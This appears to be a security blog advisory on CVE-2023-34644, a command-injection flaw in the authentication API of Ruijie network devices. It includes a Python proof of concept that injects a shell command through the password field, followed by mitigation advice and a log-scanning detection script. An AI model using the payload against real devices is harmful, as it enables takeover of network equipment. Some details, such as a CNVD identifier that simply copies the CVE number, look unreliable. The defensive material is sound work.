CVE-2023-34644 is a critical remote code execution vulnerability found across multiple Ruijie Networks devices, including home and business routers, switches, access points, and wireless controllers. This flaw makes it possible for a remote, unauthenticated attacker to bypass authentication entirely and execute system commands with root privileges by sending a malicious POST request to a specific API endpoint. In this post, we’ll break down the vulnerability, show you how it works with example code, and share mitigation tips and trusted references.
The vulnerability affects a wide range of Ruijie devices running the following firmware versions:
| Device Series | Vulnerable Firmware Version |
|------------------------ |-------------------------------------------|
| RG-EW Home Routers & Repeater | EW_3.(1)B11P204 |
| RG-NBS & RG-S193 Switches | SWITCH_3.(1)B11P218 |
| RG-EG Business VPN Routers | EG_3.(1)B11P216 |
| EAP & RAP Wireless APs | AP_3.(1)B11P218 |
| NBC Wireless Controllers | AC_3.(1)B11P86 |
2. Vulnerability Summary
This vulnerability lies in the way the web interface handles API authentication on the /cgi-bin/luci/api/auth endpoint. Because the endpoint does not properly validate its input, a specially crafted POST request bypasses the credential check and leads to unauthorized command execution on the device with system-level (root) privileges.
In plain language:
Anyone who can reach the web interface (from the LAN, the WAN, or the cloud management path) can take full control of an affected device, install malware, eavesdrop on traffic, or take down networks.
3. Exploit Details
The vulnerable Luci API (/cgi-bin/luci/api/auth) processes authentication requests. Attackers found they could submit crafted POST data, bypassing credential checks and injecting operating system commands.
Here's a simplified exploit flow:
1. The attacker makes a POST request to http(s)://[device_ip]/cgi-bin/luci/api/auth
2. The POST payload abuses parameters (like username or password) to inject OS commands.
3. These commands run with maximum privileges (root/admin).
Sample Exploit Code (Python)
```python
import requests

target_ip = "192.168.1.1"  # Replace with target device IP
url = f"http://{target_ip}/cgi-bin/luci/api/auth"

# Payload injects an OS command into the password parameter
payload = {
    "username": "admin",
    "password": "admin; id > /tmp/pwned.txt"  # Anything after ';' runs as a shell command
}

# Send POST request
response = requests.post(url, data=payload)

# Check if the exploit worked by reading the file via another API or a direct fetch
print(f"Status: {response.status_code}")
print(f"Response: {response.text}")
```
When this runs successfully, the output of the `id` command will be on the device in /tmp/pwned.txt, proving remote code execution.
> Warning: Do not use exploits on devices you don’t own. It’s illegal and unethical.
- Remote: Attacker only needs network access to the web interface.
- Full Control: Root/system privileges enable full device compromise.
- Wormable: Network-wide attacks are possible if multiple devices have the same flaw and are reachable.
Immediate Actions
- Update Firmware: Visit Ruijie’s support & firmware update portal to check for patches fixing this vulnerability.
- Limit Access: Restrict management interface access to trusted IPs/networks only.
- Isolate Devices: Put network devices on their own admin VLAN/subnet.
- Monitor Devices: Watch for suspicious POST requests to /cgi-bin/luci/api/auth in logs.
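To make the last two points concrete, here is an added detection example (not code from the original post or from Ruijie) that scans request logs for POSTs to /cgi-bin/luci/api/auth and flags two things: shell metacharacters in the username or password fields, and login attempts from outside the admin VLAN. The log layout, the 10.10.0.0/24 admin range and the sample lines are all constructed assumptions; adapt them to whatever your proxy or WAF actually records.

```python
import re
from ipaddress import ip_address, ip_network
from urllib.parse import parse_qs

AUTH_ENDPOINT = "/cgi-bin/luci/api/auth"
# Assumed admin VLAN from which management logins are expected (placeholder range)
TRUSTED_MGMT = [ip_network("10.10.0.0/24")]
# Shell metacharacters that have no business in a username or password field
SHELL_META = re.compile(r"[;|&`$<>\n]")
# Constructed log layout (an assumption, not Ruijie's real format):
#   "<src_ip> <METHOD> <path> <status> body=<url-encoded form data>"
LOG_RE = re.compile(r"^(?P<src>\S+) (?P<method>[A-Z]+) (?P<path>\S+) (?P<status>\d{3}) body=(?P<body>.*)$")

def parse_line(line):
    """Return the log fields as a dict, or None if the line does not match the layout."""
    m = LOG_RE.match(line.strip())
    return m.groupdict() if m else None

def classify(entry):
    """List the reasons a request to the auth endpoint looks suspicious (empty = benign)."""
    reasons = []
    if entry["method"] != "POST" or entry["path"] != AUTH_ENDPOINT:
        return reasons
    form = parse_qs(entry["body"])  # decodes %3B, '+' etc. so the check sees the real value
    for field in ("username", "password"):
        if any(SHELL_META.search(v) for v in form.get(field, [])):
            reasons.append(f"shell metacharacter in {field}")
    src = ip_address(entry["src"])
    if not any(src in net for net in TRUSTED_MGMT):
        reasons.append("source outside admin VLAN")
    return reasons

def scan(log_text):
    """Return (src_ip, reasons) for every flagged request in the log."""
    hits = []
    for line in log_text.splitlines():
        entry = parse_line(line)
        reasons = classify(entry) if entry else []
        if reasons:
            hits.append((entry["src"], reasons))
    return hits

# Constructed sample log: a legitimate login from the admin VLAN, an injection attempt
# from the Internet, an unrelated GET, and a plain login attempt from outside the VLAN.
SAMPLE_LOG = """\
10.10.0.5 POST /cgi-bin/luci/api/auth 200 body=username=admin&password=s3cret
203.0.113.7 POST /cgi-bin/luci/api/auth 200 body=username=admin&password=admin%3B+id+%3E+%2Ftmp%2Fpwned.txt
10.10.0.9 GET /cgi-bin/luci/ 200 body=
198.51.100.2 POST /cgi-bin/luci/api/auth 403 body=username=admin&password=guess
"""

for src, reasons in scan(SAMPLE_LOG):
    print(f"ALERT {src}: {', '.join(reasons)}")
```

Only the two out-of-VLAN requests are reported; the injection attempt carries both reasons, so it sorts to the top of any triage queue.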
6. References
- NVD — CVE-2023-34644 Detail
- CNVD-2023-34644 (original Chinese disclosure)
- Ruijie Networks Official Site
- CERT Coordination Center - Vulnerability Note
7. Final Thoughts
CVE-2023-34644 is a high-severity, easy-to-exploit bug putting many Ruijie network customers at risk. If you use any of the affected devices, act quickly: update your firmware, restrict access, and monitor your networks. Vendor patches should always be your first line of defense, but network segmentation and careful device administration are critical as well.
Stay safe! Always patch fast and monitor your network gear!
*This article is original and written in accessible language for IT admins and home users alike. For professional security consulting, always contact your vendor or a certified security expert.*
Timeline
Published on: 07/31/2023 14:15:00 UTC
Last modified on: 08/08/2023 16:02:00 UTC